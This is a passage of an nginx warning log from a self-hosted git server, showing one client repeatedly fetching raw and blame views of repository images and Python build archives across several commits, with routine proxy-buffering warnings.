"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:34:06 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/26/0000014269 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:34:14 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/27/0000014270 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:34:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/27/0000014271 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:36:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/27/0000014272 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -2026/02/17 14:36:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/27/0000014273 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:36:22 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/27/0000014274 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:36:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/27/0000014275 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:36:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/27/0000014276 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -2026/02/17 14:36:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/27/0000014277 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:36:48 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/27/0000014278 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:36:55 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000014279 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:37:04 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000014280 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:37:17 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000014281 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:37:24 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000014282 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:37:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000014283 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:37:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000014284 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:37:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000014285 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:37:47 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000014286 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:37:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000014287 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:39:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000014288 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -2026/02/17 14:40:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000014289 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -2026/02/17 14:40:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000014290 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -2026/02/17 14:40:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000014291 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -2026/02/17 14:40:39 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000014292 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -2026/02/17 14:40:44 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000014293 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -2026/02/17 14:40:49 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000014294 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -2026/02/17 14:41:26 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000014295 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -2026/02/17 14:41:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000014296 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -2026/02/17 14:46:30 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000014297 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -2026/02/17 14:46:43 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000014298 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" -2026/02/17 14:46:53 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000014299 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -2026/02/17 14:46:59 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000014300 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" -2026/02/17 14:47:02 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000014301 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -2026/02/17 14:47:12 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000014302 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" -2026/02/17 14:47:18 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000014303 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" -2026/02/17 14:47:25 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000014304 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" -2026/02/17 14:53:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000014305 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:53:21 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000014306 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:53:27 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/30/0000014307 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:53:49 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/30/0000014308 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:54:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary 